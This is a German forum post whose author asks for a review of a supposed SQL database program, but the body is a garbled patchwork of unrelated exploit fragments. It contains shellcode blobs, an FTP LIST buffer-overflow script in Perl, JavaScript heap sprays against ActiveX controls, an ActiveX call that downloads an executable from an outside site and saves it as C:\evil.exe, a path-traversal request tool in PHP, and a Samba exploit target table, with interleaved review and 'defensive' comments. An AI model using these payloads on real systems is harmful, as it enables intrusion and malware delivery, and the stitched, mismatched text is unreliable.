  #1  
Alt 04.09.2009, 13:41

Bitte eine Beurteilung


Wollte euch nun mal fragen, wie ihr mein Programm hier beurteilen würdet.
Brauche bitte Feedback.

Danke


p.s

Sollte eine SQL Datenbank werden.

# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
$ diff src/ctrigger.cpp src/ctrigger.cpp.new
9a10
> #include <stdio.h>
19a21,33
> void strip( char * str, char c )
> {
> char * p1 = str;
> while ( *p1++ )
> if( *p1 == c )
> {
> char * p2 = p1;
> while( *p2 && *p2 == c ) { ++p2; }
> if(*p2) { *p1 = *p2; *p2 = c; }
> else { *p1 = '\0'; break; }
> }
> }
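Review bot: `strip` never examines `str[0]`, because `while ( *p1++ )` tests the current character and advances before the `*p1 == c` comparison on the next line, so a leading `c` is left in place. If this helper is meant to filter a character out of text that is used elsewhere in ctrigger.cpp (the call site is not in this hunk), the unfiltered first position undermines it. Iterating with `for ( ; *p1; ++p1 )` instead keeps the rest of the body working unchanged and covers index 0. A null `str` is also dereferenced without a check, so the caller has to guarantee a valid buffer.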

# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
# Connection setup: target host and FTP credentials come from the command line.
$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
# The bytes below spell "LIST *"; the 272 "A" bytes that follow are filler.
# Defensive note: a LIST argument of this length is far outside normal FTP
# use, so a server-side length limit or an IDS rule on oversized LIST
# arguments covers this request shape.
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;
# Open a TCP connection to the FTP control port and stop if it fails.
$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);
die "Connection failed: $!\n\n" unless $sock;
# Pre-built FTP control lines, each terminated with CRLF.
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\ xf8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\ x68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\ xfe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\ x2b\xc6\xcd\xfb".
# Target selection by the fourth command-line argument ("==" compares it
# numerically). NOTE(review): all three branches assemble the same string, so
# the selector has no effect as posted; $address2k, $nopsled and $shellcode
# are defined outside this excerpt.
if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
# Report the connection, then send the USER line with a one-second pause
# before and after it. The return value of send() is not checked.
print "\n[=] Connected.\n";
sleep 1;
print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;
id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C
if (strlen($ora_osb_bgcookie) > 0 && $button == "Logout")
{
// Turn DEBUG_EXEC to off
$tmp = $DEBUG_EXEC;
$DEBUG_EXEC = "no";
if (strncmp($msg[0], "Error:", 6))
{
// Set the cookie up.
setcookie("ora_osb_bgcookie", "");
setcookie("ora_osb_lcookie", "");
$ora_osb_bgcookie = "";
}
// Request parameters are taken straight from the POST body, with no validation.
$hostname = $_POST['hostname'];
$file = $_POST['file'];
$port = $_POST['port'];

// check_ver() and html() are defined outside this excerpt; check_ver() is
// called with the host, a command string and the port.
if (isset($_POST['check_ver']))
{
echo '<pre>'.check_ver($hostname, 'ver', $port);
if (isset($_POST['parampampam']))
{
// The command string embeds "/../" and ends in a NUL byte. Defensive note: a
// service that accepts a name after "help" (presumably a topic or file name)
// should reject path separators, ".." segments and NUL bytes before it builds
// a file path from that name.
// NOTE(review): the remote response is written into the page unescaped.
echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
html();

}
}
try{
var obj = document.getElementById('kupa');
var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
var loc = "C:\evil.exe";
obj.Save("C:\owerwrite.ini");
obj.HttpDownloadFile(rem,loc);
}
; unbanallx: removes every entry of the channel ban list with one MODE command.
; %chan is not assigned inside this alias, so it has to be set elsewhere.
alias unbanallx {
; Request the current ban list from the server.
mode %chan +b
; $ibl(%chan,0) is the number of entries in the internal ban list.
if ($ibl(%chan,0)) {
; Only continue when the client is on the channel.
if (%chan ischan) {
; Only continue when the client is op or half-op on the channel.
if ($me isop %chan) || ($me ishop %chan) {
;mode %chan +b
var %x $ibl(%chan,0)
var %y 0
; Collect the ban masks into %banlist.
; NOTE(review): %y starts at 0, where $ibl returns the count, not a mask.
; NOTE(review): $( ) is the short form of $eval, whose second argument is an
; evaluation count - verify that this line appends masks as intended.
while (%y <= %x) {
var %banlist = $(%banlist,$ibl(%chan,%y))
inc %y
}
; Send one "-b" flag per ban list entry, followed by the collected masks.
mode %chan $+(-,$str(b,$ibl(%chan,0))) %banlist
}
else { echo -a ur not op in %chan }
}
else { echo -a ur not on %chan }
}
}
/* Table of named targets. struct versions is declared outside this excerpt,
   so the meaning of the two address fields and of the 30*1024 field cannot be
   confirmed from here; presumably they describe a memory range that depends on
   a predictable process layout, which address-space randomization removes.
   NOTE(review): 24 initializers are given for VERSN (25) slots, so the last
   element is zero-initialized, and "define" has no leading '#' as posted. */
define VERSN 25
struct versions vers[VERSN] =
{
{"Debian 3.1 r0 X restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 X",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a X 1st",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r0a noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r1 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r1 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r2 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r2 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r3 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r3 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r4 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r4 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r5 noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r5 noX",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r6a noX restart",0x0827c000,0x0837f000,30*1024},
{"Debian 3.1 r6a noX",0x0827c000,0x0837f000,30*1024},
{"Slackware 10.0 restart",0x0827c000,0x0837f000,30*1024},
{"Slackware 10.0",0x0827c000,0x0837f000,30*1024},
{"Mandrake 10.1 noX",0x80380000,0x8045b000,30*1024},
{"Mandrake 10.1 X Kde",0x80380000,0x8045b000,30*1024},
{"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024}
};
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41% 30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44% 42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30% 41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c% 56%4b%4e") & _
unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42% 56%4b%48") & _
unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b% 58%4e%37") & _
unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a% 51%4b%58") & _
unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46% 53%4b%48") & _
unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46% 38%42%4c") & _
unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44% 4c%4b%4e") & _
unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45% 4e%4b%58") & _
unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e% 30%4b%44") & _
unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e% 32%4b%48") & _
unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41% 53%4b%4d") & _
unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e% 50%4b%58") & _
unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50% 35%4a%56") & _
unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48% 4d%48%46") & _
unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47% 47%43%37") & _
unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b% 4c%4d%4e") & _
unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49% 48%45%4e") & _
unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c% 36%44%50") & _
unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d% 4a%47%55") & _
unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43% 45%43%54") & _
unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a% 56%41%41") & _
unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a% 36%46%4a") & _
unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c% 46%42%41") & _
unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d% 4a%50%32") & _
unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f% 4f%42%4d") & _
unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f% 4f%48%4d") & _
unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43% 39%4a%46") & _
unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48% 4d%45%45") & _
unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a% 46%43%46") & _
unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49% 42%4e%4c") & _
unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41% 33%42%4c") & _
unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44% 44%4e%32") & _
unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b% 4a%4a%46") & _
unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46% 44%4f%4f") & _
unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41% 45%4c%56") & _
unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42% 4d%4a%46") & _
unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48% 4d%4c%36") & _
unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47% 35%4e%4f") & _
unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f% 4f%42%4d") & _
unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f% 4f%48%4d") & _
unescape("%4f%4f%42%4d%5a")
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\ x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\ x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\ x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\ x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\ x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\ x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\ x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\ x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\ x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\ x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\ x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\ x4e\x50\x4b\x44".
# Fixed-length filler strings; the repeated byte differs per buffer
# (0x42, 0x43, 0x44), which makes each region recognisable in a memory dump.
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
# The fourth filler shrinks as $shellhunter grows; $shellhunter is defined
# outside this excerpt.
my $overflow4len = 977 - ((length($shellhunter) - 7)); #very important calculation
my $overflow4 = "\x44" x $overflow4len
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
# Hard-coded little-endian addresses, per the author's comments. Defensive
# note: values like these presumably point into a module loaded at a fixed
# base, so they stop being valid once that module is built with ASLR support.
my $eip2 = "\x37\x55\x03\x10"; #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10"; #valid char for buffer, heap address
# Repeated marker values; the variants differ only in trailing 0x41 bytes.
my $lookout = "\x37\x65\x41\x45" x 40; # 45446537 look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4; # 45446537 <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4; # 45446537 <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4; # 45446537 <-
my $additionaddr = "\x35\x65\x41\x45"; #used for an addition in the shellhunter (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
"%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff% u13cf%u01ac" + ' . "\n" .
' "%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb% u0c8b%u8b4b" + ' . "\n" .
' "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031% u8b64%u3040" + ' . "\n" .
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 8000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.SetID(x);
}
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\ x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\ xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\ x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\ xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\ x8b\x4e\x52\x8a".
# These two byte strings look like the fixed parts of a TFTP request:
# "\x00\x01" matches the read-request opcode and $p2 is NUL + "netascii" + NUL,
# the transfer-mode field. TODO confirm against the code that sends them.
# Defensive note: a server parsing such a request should bound the length of
# the field between opcode and mode before copying it.
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";

# Three-byte address, per the author's comment.
my $ret = "\x5d\x10\x40"; #0040105D -> SkD's Tricks
my $nopsled = "\x90" x 10;
# Bytes left over in a 274-byte budget; $shellcode is defined outside this
# excerpt.
my $len = (274 - length($shellcode));

# Stop when $shellcode does not fit into the budget.
# NOTE(review): this error path exits with status 0.
if($len < 0) {
print "[x] Your shellcode is too big! Find another way \n";
exit(0);
}
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 3000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.CreateStore(x, 1);
}
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
# grep allow_exec /etc/verlihub/dbconfig
allow_exec = 1
or
# grep allow_exec $HOME/.verlihub/dbconfig
allow_exec = 1